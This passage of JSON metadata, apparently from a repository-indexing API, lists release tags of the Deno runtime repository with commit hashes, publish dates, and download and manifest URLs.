.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6"